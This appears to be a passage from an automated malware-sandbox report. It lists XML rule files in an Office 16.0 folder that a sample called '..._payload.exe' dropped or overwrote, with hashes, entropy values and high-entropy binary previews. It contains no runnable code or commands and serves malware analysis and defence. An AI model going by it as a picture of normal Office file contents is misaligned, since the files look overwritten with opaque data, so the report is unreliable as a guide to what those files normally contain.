                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1730
                                                                                                                                                                      Entropy (8bit):7.89595438123917
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ywPtn98bYmYm5RCyGk1eXmO7HOLWGEneYIGvRXTeTmjtbD:ltWEszfOXMWGEnesvRXqTmjd
                                                                                                                                                                      MD5:C7D8978DE9DEBB87F5A4942544C05309
                                                                                                                                                                      SHA1:CA85BDE16B2A262879799C998E11F764151FFDA1
                                                                                                                                                                      SHA-256:C6AF131D402564F16899E2C8281D704651B97D50162ABBF10E9EFF77C6157ED4
                                                                                                                                                                      SHA-512:E50A79B24EE1A96EA06D527292EEAD4B9507E86A41DD005CF066B87E9B8AA7E58692B751DAD9FC94468CCB0D335D963B7709DA56491D0CBA9F74B0FE445A82AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.+O)..{..q..|*z...?......"m4.~...BYo..$.......M.....|u....P).7..O..Pr8..e.d......>..{.3kb..z...]<.Ph`...3....imHD..>....S......[.......O!..{.n.?..Z..E..o..:U.D.....c....2.;..........<..v..j7...m...0..\l..h!a.h....90D.E.>x.......R.C.!L...9.....4.T6.<^M.$..qQ}pWC.'...._.......\y...;k...j.7Zmr.L....8q.9.P9..jx..wT@J'y.P...+......L.".v.f..[.M.&f..3......:..Pg........R.6..$....;.....Z.O7P~..}{y+P.=-..I.=...#.1.^.........z.J6EsL.......m"...\i.?.Qr......\...,....S_N8/....$.O......1..[......B..S...x....(.....`....k......xN.]p,d.U..|..3.........<.......d...3.........,.-` ).6<.C.q..8...32e/.x..v..7.&q.e..x..I.....i.%cKPG..c.tt....y....4&a..z....H.B..}.Wo<3U.n...r.H)/2...Nh%w.@..v.2g.. .V.C.t..a&.... ...Z6.L....#.$.{..I?/..rG.....M.H..C.,v..J.8D.m..f....`.`......U..;.0y.U.!1...)^..../kPX[,h....&_.Q.c}..._b...W.d.n;<.....&&Q.'..|U.z...|.G...l.<h..S.........c..J..#..9=..!.=6g..[.....C..'.....l.d|..P..b..uM....a..1d../.NK....H..".9sR.i..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702500v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1711
                                                                                                                                                                      Entropy (8bit):7.893739956472522
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:6NQIQdrdNTGNyv5DdGrJvLQCl0o97cFyD:6NQJdf1Edvyo979
                                                                                                                                                                      MD5:D421628DD5E83133842EEAFB0713F7AF
                                                                                                                                                                      SHA1:948ADE46A60493F4E10BF5A57AC9767AB6508A95
                                                                                                                                                                      SHA-256:86378BE4E5605BB23B1563BF205F2B0A4298214C6480E5958237258AC7E8E9E7
                                                                                                                                                                      SHA-512:722DA51640AD972C223B0BB3171897A4BFFB456D249AA5769C6F41704C6E3EBF9FA82C217C2BC5C90E1ECD90DE3FF08B2424B3C94840EE232A8931A2B52EBBCB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..g.V..]._.@a=$ .Z...}.[M`.\7..|..kx.<..uYz...#.S...S.v"|.`.Zd.T..q^..M.f...Z..C..A...nT.c..;k......D....z..z..V..Lx...z..........$..e!...Z..}l.xp\E5..y..x...V......-.vI.DcBf....z....&...Y....h3..uv.n..f7.....-*........p..%{...:.+...w.<..iZ...7...!...WyY.......-..~.............Z.yw..o....h.F.yX[.of.....E!0..a..`..{M9.?."....I.......`.r....p.."#:.]..w>.!@i..i6.F...J..X0....E......Q...<YDc...x..........&.1..^.sH............V3*..g.>7.....a....5.k....i...KY.u. y..o=K)..$...r...r.W.r.1..5.Wi.x..V.....*.*...H..O.....|....o......'....)./..o.....^.G.3y.s{..........Qzv+..5C.KP-..7"T.'G.!y08.b..F..|c...w.0M".d.....}..I...Y...N.A.....G^..Ol.F..[S.)....x...(.0IKX.J....#........ET.....t...c.Zzg...c.n..e.....\Q-....+Nt.(....... G=.iseP3.<.9U...v..I...."o[[T...l..4..q..NT../A...T.P... 3....&...f...dn.b+..'.....=2'....P..*vl.U....:@...\yR._.)........t....H'A.oI.g....`..5...)P........x.$Y2..5.I...l.@m..pux...d........]........{.EB...gy...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702501v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1748
                                                                                                                                                                      Entropy (8bit):7.8800232403099075
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:6Ggy24yYy9t8dfBsFQC5YnWOCsqhQM84xvFf94mbAD:EyzyJUdkbhOBq1/Qb
                                                                                                                                                                      MD5:8628EC55E03FE4B67EC469BC9435F0B9
                                                                                                                                                                      SHA1:B43A85F731B17D1B34459659009F1FA50DAD835D
                                                                                                                                                                      SHA-256:DD8D55BB57CE3895ED5B46C569A9102AD7EF8C371DA3185CC24B391751D8C2EB
                                                                                                                                                                      SHA-512:CFA93279E38E836253D362DFAEA96276A90C4FB7E202F55F306DE2DE7FFBF759A1AA0E9C52378D8E4DC8ECBB77A7F9DB4837435585A707A34E72BB2F3B9FAB1C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..Ps.e|.o.$.wC.l..co%V.%..3..f(kfK.4......Y...p.1...{L"~A..Z......."...../y...+F.:..f.\V.O..i..'.+.T1...xi.b...x......g+}......\3.>w"N3K...._..$.9.T..........$...c$.r ..i...80...aN......B.PLT..e.b..j.oB.M.0. ..=.....)F.UG...f.o.NH........,..U.........@..gM...%?K.o......:...D.S.....l.....r.V.0.$5.l:...t...e.;]....0.'.c..+...26.'|W32.$3../.j.'.1..|..AM..5a..X.z.r....uQ.'...H...!.......d.T....:u._fX.T..0W..B..S...3/...|.[E....:../.....B.m..!.....N#./!zj.E....$af.a"..$G5../....9.}..D..)..6..x...E.a..7.sj..\S......C-.6.k. ..>.w).."...+......o.Pm............wW..J.$.%....:.........:2.)RH!..d../=..2K>...W..(^.=.=.D........1......7.Z&.5V./.r..=.Y}..8......uV....2.d.zt....i...P.mJ..\8...'GS-...........5A.({.W..3.[E>...k....!$7.-..*..c........$...U...x.].@.n.2.....0Om...-..,..}.t-.......<..P...Ie..R...%....x...6.._O!.cZh=.D[.D.R.y4.T8,!..]v.M...R..I...EmZF./..G......@.8..4.:.9.r.lG.).jp]....?...1.J(..........A..)....[H.~..~qv.`..m..!..%..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702550v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1711
                                                                                                                                                                      Entropy (8bit):7.877655107675178
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TYFOq4Cl6Eq3f711naqBpsxpF+qSgQfUXfZVDKxzpX7HwDwQI8SB8CxYL8G2bD:Usq7l6EWBTopFtrQfEZAFwvU/D
                                                                                                                                                                      MD5:AA894D8ECE8F074DC7D1E400B5DDEE99
                                                                                                                                                                      SHA1:2486D0BA6A0729CF12B421C336FB3EB6D8EC4B78
                                                                                                                                                                      SHA-256:B8978D65B4F7F714235EE0D792191DA40F1F49C07269F1D8DA2D90BBA13A30AE
                                                                                                                                                                      SHA-512:04332B185EE510CE0B49DA17BA55C5D120B5DDC6FE522E1EA652200DD43DF5AC0677B25D9E7A50D8FC025A95674DA0B5A8DA14A09F503485F1811BF7065559C6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....Y......z.....l.....#..fz..>k.p=.D.........M.[.yT..I_.<...jR.eX...2I..Uk....d}..R..I.NK.....z{.N.*.;..{(.}..|..}.,C.N...i.45..>..CU..n.W..O.b._..MM..T......2.....NbW.}.v5..iy.;.^=.+.....&p6.....F1u.Ti..8*.U.._NJn.U..f...k..\.b5..:..D kL...C.k..l.W.a..3z.........>......a..z.O&....*.....tW.........[....Zq..t]u).ZY......A.'X..9p..7=..G9E7.e...........r.[........]eNl....c..3.bt..$4.......-s.sN.{..WL...FEvW`U[.b.9...(...O....*o..[`....8}]...B.n;..{..*.. ..=......p3U.....cB.P...b.d....^XqY....$159;]r......Ly.@.% S.k..gC.r.\{3...J<.tF9\..b..R.7.:.Af..>.....L...q..Jx....A^.._.....9~....X..FC#..pa..F...x.K<.#}..~K...<N.?.xGU.l.^...`...=.3.5......u.i..]h..._T.2...*oI.FF.s.../...1.3..a..-..4.>g...@R{....s.c.E(U.../.....T:RPI s....;x.\m...p.....T.A...i..~..p..Q...+|..]"R.=kvjA.YsM.......)..G.&,8"`...x...x.2f....l.kB..}.K...I......l|....@....W.c..B..k`2b.#.......>..\A.....%....2......i3..{.X. ...h.'..m.y....c.:w2}./.E<e]...".Y...H..v.G.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702551v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1748
                                                                                                                                                                      Entropy (8bit):7.86900953791662
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:NGmB6tvDLESQrbElUs7wtEpyXlGfN4KAD:N9YhDL/MbElUs7FpyXAfO
                                                                                                                                                                      MD5:7526E8DEDD59D57DA2D118257B439803
                                                                                                                                                                      SHA1:3C28AF6F25041000F74D8CD08585D622320E5FA5
                                                                                                                                                                      SHA-256:823B84CDBF1EDF9B714B7FE4F35F13EDBCF9FA4DDF9329D191FB50A2B8907846
                                                                                                                                                                      SHA-512:C4EA47C872D33495196017E31444BFA0530AD17CDF2AD6E1CBBD1D2A73BB75D9862975071591AB222FEA7F69F5BE3C5A25B069FB755BEDB369F3F5CE1534BE82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.g.i.(.G...+A....!....3...R@...@.o..u.r...Sh.y.&j%=...X..V....C..u..@..r!L...l......pc...S.6..F...X.....r.......4;.H...|6;..t.R..2..T....ZuG...A6.....#.E....@4....(0xE..T/........>..O.G..Y...E;..e..+z.}.../... ...+.........k.1.?.O.....W?.....q...l...x..YER....}?....Q.m..[..g.:.,.F....s.I@.8}..I...q..2q...Re.......erz)..}7<u.C...z.U..TP......T?-...r0.w/m._.y..szr:..x#_m.....K..Rn...rZ..RS.C.....Fg.#d.{.m.0......2..z.=.k#...I.......1.........Yn....~f.......4+.....2f..q.g1.h.[...9P....iqC$l...iQD.@..i`.\f..Z.m.....U?O.w..v......'.K.c:c..=...O,~..('zz\..!q.^..:.K...a.<....}....A.]9.6..-..h...>1x...y.':<.?....E.!..'"n....^PB.y[....i..f.].2.].'..L...1}Je.....0.`r@.b9.....?.F...7...^....8.fjR....$..[xu&.Q`...E..g6..}7.+"..1..V..Bj.0.(=.....m..znB.Z.....Y..;~..R..!.......t3........X6.oM..?L..&..$......=2.Xw0R..f.I..r~a.....C....F....=8.a...z+P..^.S...c.Y......]f....?G...V.H.h.*.....A.X.l......yid..ERx......../S...u......f..y..Cyq.. .%.&h5..m

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702600v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1705
                                                                                                                                                                      Entropy (8bit):7.885404563557492
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:zEhYP8RKiQo88U9IZKN2I4R7wbNa/5dGDYVV1d+EtUhy5KAD:YYP8giQoKOy4R7wI/SMr1xUho
                                                                                                                                                                      MD5:977FEE3BCA3D9EA8C8E1A8031DE31206
                                                                                                                                                                      SHA1:07523F49F7372330ADF4F5B1032B6FC9C533271C
                                                                                                                                                                      SHA-256:118834930ECCBF519769436DC55E0D9F243DFE3CBCEA62A30D57BA1C69B13402
                                                                                                                                                                      SHA-512:DE30DE62B3058C2261A8F74AE881DA938355B445AB231BD46570399F03319F28DC426D740CCB9E9869F32096BC4E93852CD4C7D9753A5599DF975B4889EB5210
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml'.N......X>.2Q*.*.).E.<.,N.......aA.V.r..z...c..'W....cY%b.\H.ORMc..y\/x.....u...b..........A...G........$...KI.(u...Y..8.WN.X.\..X.,r.M..j....O......'./.@<J...O.Q~.......3..0.T..P.k..}9.O.JE.J..w._...?gJp....o..`.%...kp...u'DP........I....A..R...L...1C0..$.n....."8..hcy*S......^..\.ra.[....'.u.?...$i.%.T....[./.KY.O4..g..zE.^.i>8..v.U/:.1.....}.3Lt.h..A,...0.FZ/..RV.......;.V./..7...K..j.;....2.Qy4...2u...z....7.c.....l.rC.I...oh....)F....j....x"r.....\g0<Zy4...Li.P$m..|.....U....o....^.&uD....m.....p0...7..U.J...Kq.4....#X.Fw2y..]<d..0.........x..W.e.......m.....7u.8...l@..PA..3.Lq.*..b.......k.>],.G.k..>..O}.a.t.....\fw)...zk..{.r....L.|ZJU.6.......L]..B.....V..y.5m'pv..;.RNR...e...A.y{< ti........4.U....Sh.U9.:%..LQ...M.j.............b...n...b.....q#..o.KDj.Y8..qn..Q{."_s.U..7...t....O@.?.|..D.~J....-rJ....../.H.&n.a...HW7_...yTDj7.D.C ........GJz...n!......p.~|I8.9.EK....l.-..[?..F...B5..&.....0...u.-.....V.Q4:.....Q..V.9....M.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702601v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1742
                                                                                                                                                                      Entropy (8bit):7.901797254085506
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:kQkLquqVgNOT2UpukLnMLR0oxcocyZDbzB8Fj1eWAKZM8I2MlN6OQO2bD:kPqnQ3yJLn8R/c18zCFj1ep8YlNAD
                                                                                                                                                                      MD5:4F184278BF4208F21F865C4DFF07FF8C
                                                                                                                                                                      SHA1:D620093E8A94E80CA0DB4584381EA986FB54AABA
                                                                                                                                                                      SHA-256:55514ECA3502F6E34B6D8C0B8340997F0C5AC8C3F66FCFAD494461B7FF6183F6
                                                                                                                                                                      SHA-512:3C5C76F3EC29B8F94F5999A9210039D775208C9A14E6A43FDE81DC2CDB92770C15B4083F4D7D60B06F1FDAA87E514B27C4341BEE0164691F00310781EB40F884
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml........P..).....}].(.t.X.h..Y....q..3......K..|h..Gt.r..H...[Gx.|2.%....DF...P......C$0..G.sj.g...{........a=...=.B.H,....4{-..i...f..<....?Qb.}...>o.U.$...2a%.<......J.l..-.....y...!\..L......V...pLsUIgp.'..P...)...d....$q.....M.VU....t.k.C.I=.....45f...jg.q;.@..Z.k4..M....u..2(...[xB.].Eb.Q.@.P....v?]..6p..aF.. ..O..]......Na...>.G..#..z.F.r 9(..J{...3...Lp.Y..;.e.....r....S.R../....D9.\.H....m^.H..`rE.}.Fd.qR....M..?_.N.....v..T.&f.sY^Z.:...\.\@..!j."..1...\C....*.n.dd..r&g..M..3$.m....w..O...0y.......V.L,.dy..)G.I..oE?).C."...F..E..8.-.......)o.n~...............i...sQO...a..8.%M..T:.M.=..;..h..G....Wzj&..c...nJ.S..^p...Y.p.s.........|..).(...oN..\.y{m-|...@....$.........@.?..+..&@...4.5.0.p....V.X)).8..|...V....#1..$z4.$&.G.Z|...>L0D'_..56F.....lk?&..N....snPS".^Wp...-..).1..qw)/.7~."4]|6.X..g..M...M8.P.:........8.q.6<.......FR..q..A.5..V.~.f.7+.>....8<G.....3.].w|..S....-...(>h....^Zh........V6.eu...DN..r.X......=I..%.8....j.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702650v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1691
                                                                                                                                                                      Entropy (8bit):7.867129026810742
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:jFXgldGeKRbHcl60kv4+HkL+QMIMOim5iDxWD:el5ocl60kv4lpMIMOxiNO
                                                                                                                                                                      MD5:C4DE0117F4A92D677BC2716296B25F03
                                                                                                                                                                      SHA1:5532D1A8F278EEA9BAC100EB16264E567B190694
                                                                                                                                                                      SHA-256:2A4CEA17BD612D49133CBC30F76B1F6D5DD0BB9E3F44DA318309CD36BE6BFA29
                                                                                                                                                                      SHA-512:28882357CE2E6CE232F421C307F7E1EA80421758F5FCE4E85D3374885DB93468E7AF0C431341386DB93374F947B6A16ACB77E4F200A9FC0D24E936F88D8A3A6D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..._......cB^.wJ....A>...Z....#3S.%f=?...-.1...q..U..?%,..s..<r../....B....>...*.a.....b.O..N...L.V!5+...x..J6..P_.nw......R.7..~.H...* .y#..X.|..Q7..,.5..wCb.......S..JE.W....o.....>.f....#p.. .........K._..-u.)...NT.~.Y5."...R.-j........_.....CKB..*..:.k..k..ri.0. !{.S.z.K.h....M...g...'.....3=..YW...#..w..Z..0..un....F).c.......A...v.R.....~.... .......?.... ..n#.^y..E.....#[..4......{........'\.<7.....sU.z...I.*s.....8....nH..>_..u.*er..I..C..>I...&....K. .....*.(.....Q..Y.q.,..-.K..VG`.......jd.Qm..Y.1'.L.JE.......>..c.U.Nq.L.x...m..D..-.w.q..2}cN............:........^..........<...t...<A..cG..gR..0......k. ...IS<^>&< E.43.+.[.c.C.$..I.../...j+......0.!bc..n.."e..e.j...}..t.|....6....B.".`.e.F......B...@"k.XOY.50...o..e.........4l.....uO..{D...%NQ.G.c .@M...+....6.[.{A...+.,E..>.oi...Z>Oc.... .,......F..4Y......R..Y..&W....F....5......>fmy:>zL0..W.v9....<.!..@.&..Z.K'..U.l.Wuo..s.tJ..K...F3W;..{..+w.,E$.........K.....8..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702651v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1728
                                                                                                                                                                      Entropy (8bit):7.880671784317865
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:QKTWIT0zC3OBRxt7HZ6n67iCVKfUnJF/WA9meI5393zD:QXIoCQRxhYYKSFL9Ho393f
                                                                                                                                                                      MD5:1CA73A45BFE9AD81C3D6F39FA298EB43
                                                                                                                                                                      SHA1:D1C0F5614558AA77DAF9D9A8CECD5476A9949573
                                                                                                                                                                      SHA-256:9E4776ED2DB319CC30A8BF65958B2FB58B36EB831C7D1428EA4F2B3F2B5988A9
                                                                                                                                                                      SHA-512:EFFEDE827D35817FB7BD61A78AAAF2C196CF1514B81B0511F42CEA1BF95D4C4012B24B74196F3F5FEAF14C4CA7E449136DE024CE9E4569BF7DA2EEC1C1748858
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..YQ/T...._..6...../.:..+.#.......W...cX......+.6..,.E7..i6W.......DK.2.h.%...mj.. V.$...xr.=.l..(Ys...|....yU#.G...q6.r...g...ler0v....<.U..b.,(..x.S"j.|v..6..5...R...f....@...LSZ.z}..s.gnO.....`a.=._i.L..M..?z.O..n.......`.....T....#."E31..1...q{......m..`.x2....+J..O.[.hD..q.I...R,@.3....gP..2o..Dkl(.0A.b.).:0..Q....._.=..txp.....X...!..YM.}...Pn/.`eQG<..s..VxD..(...0('.~}....Y..r.. .,..Dm.f."..uy..wk...w.E.Z..`aU.+..'`...40..8V.sH.R.+.v.;.>h=y.a..*...N....h..#.Z8........f.).u.....ECD.....C.H...:l.G.I.....1v.z.(m.....z.A.L6......./....XcW2...DU.=,...3.....<.......\)..Mk...Y.l.1x.W4.\.j..(k.A..r$.n.x".7{G......4....pr.'TJMX]H.F..S.7K."..u3...9.rD...m..h.*]r...R...Y.........,..h.Ry.....C.\.^.`..w..]..V..Y.nU.V..r..?!,...lx.sKi...$AyN......9\].u...l<|....Y.....`l+.W9CW&...psW#.....<..S........q.9.&/S..X..v....F......d..t9........7.*.(...o.4kN...Tw..{IO..^S....U...a....n...:.3[C9..._.l>S;P.T...........9i....xK(..t|....5..A{O.....igY5...T.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702700v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1700
                                                                                                                                                                      Entropy (8bit):7.883082164466471
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:wKF9w+0hpyvLFEGmvY5gtuqeyHRyVNPE1JppqHXdEuUtYCHXNTDt/RtlE5+aLRVw:N5t5gt3TR6eZpq3eJrXNprzaLRuD
                                                                                                                                                                      MD5:8D71F0D8744B2C102EDBB6C2D75A1B15
                                                                                                                                                                      SHA1:D09C2D94C3F12B0A1097CB91D6712D30351A4E8B
                                                                                                                                                                      SHA-256:F901588E88049F233CEA3797440C875E305DB673E19EEF98B0C0D4AAD2B96C7A
                                                                                                                                                                      SHA-512:E50A4AE0840646BAC7AD619F19A0638B9317DC265A8C5E41DB45647F79AAC67BEFF213F903CF3AE5FE780FA793E22AA12784A9BC8A261BB729A56A166F153446
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml4?...d..T..5v|.fT...1......K]-J/0......@e.......u...;.!..*...kt.[..7.ic.Z.0O.....ge....U.T8Z....B..+..q.............z...^...wW.b...J....D...%......i.ha..#8...P../.e-...\...l...............C...#=.bT....u.......s.D..?.....gS0..QH..T......Svp.D..X...7..7..\.2U....y`.p;.?..rd.\..K...r 5`..-.a..e5..>4..k`t.X....[........L.....=.S.G.i..ty....k....$.`....t.s.4.g.m..3..g..C;.g.M.:js.....vN.Vn.e.......N@..;..<...5,..L....t/-u...d.Z...H......(.G....yH>.\ydF.]z.*..Q.t.....7.{..TG....F.?...9..!..n....|......b.....g.xNy..I.i...Y..\X\........8...h.k.^.....M?..I<..[a.r...Yj..Z...O.....G1~....$>x..6......[......7....>........h\....8._.i......Y..82.I.....o.t2-.v...Rzv...J"..7G>..v.@...ty.. ..... ...U.3...A/H8..a;b..oK.-M.)1.dh.i;.,.Wy.I...?/.............>>....!SJ-..r..Y.b.:8&...H...T.C.......E...W...^~.E..........K/.....c..==.U.Z.....D.q^b...5..6..{j....nK...6..4~.c7}&.^.o2....uU.h... ......?..l..-..DEr..5.......z.>Kp....B...!P.O..M.~.>'.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702701v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.873603276955784
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ro9maJzmzqKyKBpTEJ146XNCe47dFkHn3PBUD:sZJsqpex+4HeqFkHnfBA
                                                                                                                                                                      MD5:56E56B01B4D846CA1A25BE5CACF8FD6D
                                                                                                                                                                      SHA1:7DFEB048C2B6A31886EE9FE0E01F192E04481B4D
                                                                                                                                                                      SHA-256:2DD57C752DEBCC190CCD3809AF2508DE0251C65EDA4106D0AF62CE8CB7B15ADA
                                                                                                                                                                      SHA-512:C34E566D486BA16DC58A600C6AC285B963B9EA4A64E222A624263C0E4D653EAD10EB474BB10393B8B706F636F81E760B84FE6378FD30C487EEADCA82F17FEC73
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.. W..r.QB.....z.|B....|d.7.XYWi.z!..u. ..2........N......_...xG..pu...r..e..@..D.....v..t.4..<.r.-...D@..."..A.z..#a.4.....xr...B..c.......%e.9...Gj..Fj...8.QChX.O.Hc...N..5....U!."&v.v.N....P.J.3qR%1x.l!KE.C.>..S...W.h..|.E#.......g....s....+..9.GI:.........C...Z...}}Z3.8.UA.w.l.p]i..7...I.zm...xCaM.z..}...*.C..J'emb...r_/r....V.F.}......}t2*...z...SR.q..z..{.o..C.(+".f...`...!..S...H..1*....O.M.$...^..........a.)........s(X..w.x.mM.#;....H.!.C.....>!7...<*..dm...h`,H..zO.8!>.l..2..m.-+K..<;..T.s#..cu.../...y,.kbM%:...-..y.-._..T.k....R..s/o...H..J......:.lK..1.l.}%4n%L.K>L..tz2cJ.....^d9URb...D....g..@.#i.v..K!`.9....(.+O.....;lJ..J%f....9.F}.R7.D..*J8..$.mA..E..B....L...Y..{#?..}mnn.X..o.Y..A...o..e.^..........j..}o#.i.*.......*.e....j..s...D.9..u...~:e.......M/.W.a..A..9.n.....d ..y..Sge..8...,.M]s....Q..'...Y*.5a@z..i..2g_v.*..Rp..9\..99.o%3.....L.@H.&.k.'M.+qaH..Oz..h.9.G...%.5u......OA;G..._...j.{....PZ2.5.O.....iJ....|.S

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702750v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1699
                                                                                                                                                                      Entropy (8bit):7.8710416185358305
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gC+DGlZv30061DhtVc69vZn5Z4Xj5InXBwxGafFLfAAHF1pXaPVsUonPsOEuNfZH:mCtGDh/cgNYXxGW7AAfpginZRQQ/5tD
                                                                                                                                                                      MD5:D1F451626750FF253774C829946D17A8
                                                                                                                                                                      SHA1:28C38BC0BD321628C344439368A24856841F17DA
                                                                                                                                                                      SHA-256:730D1156C2A2728DFD03307D54A49C5BA38AC7DC16657D1B650AEF9D30B072AD
                                                                                                                                                                      SHA-512:B9F3A15A88CDA3916C84CC9FD7750046D551F500CB560215158BC98D911930482694F64F4FE232E8994F73A8F567D32028B2C23C2AFD2E6559E32E42EBEF6851
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....930...../.AZx.... ._...8aV~oLl..@...P.Uh.....SF.._.4[m.<.p..(/z.*..r..:N>.........Q..q.........[...$Pr....ff....r.#CC...+.O.4e.0.I..3.9.nM..A.\.M.......S....r|(.1....6..{.G..K_FUGs...0:..S.t..S...+>.....g<L....)...xt....7.C.Q. .....2Jpi...U..r..Pz2.J.M..\.h.......W....T.ri-..........b.....c.C"x...2.h....~f........3X.T..J.c.+...i....s.. =....Y......r....H...|......4.0O.j....s ....M</W.e.....G.T'..-".?l..."...).=.hJ.q...".K..i.E.%.[....#......O.,.a.1e.)3.....}.*.s.:/.GM@/...b....}iO...j.U#,U....V...6.2..e...Y.C/2.4&V..D.....%.Y.>..6??...?.O_....G<.-.l<W..p....b....n.....s.L..)N...3Y......z....F)`=.U....A[....U.W........u.H.$./.Cy.Yd'..GK.l...s..p....-.|9.g.&...S.]..5..7L..D.n.z.N.a..na+0H....+..[...-...Dw.;.D.U6s.u..T.j....Q.L"..B....}.......-...96.c3.+.0.dU4.n......P..8.s.XB..=..Y....I.BzI..<}...8$...G.....NUyo..1`..!..1.......e..r....Nv.8jf.R5.........e.5rX.......d..<......(...l...n.,........)..o.B..)R.AL.b...L.7wZm.S.V......V.?'

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702751v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
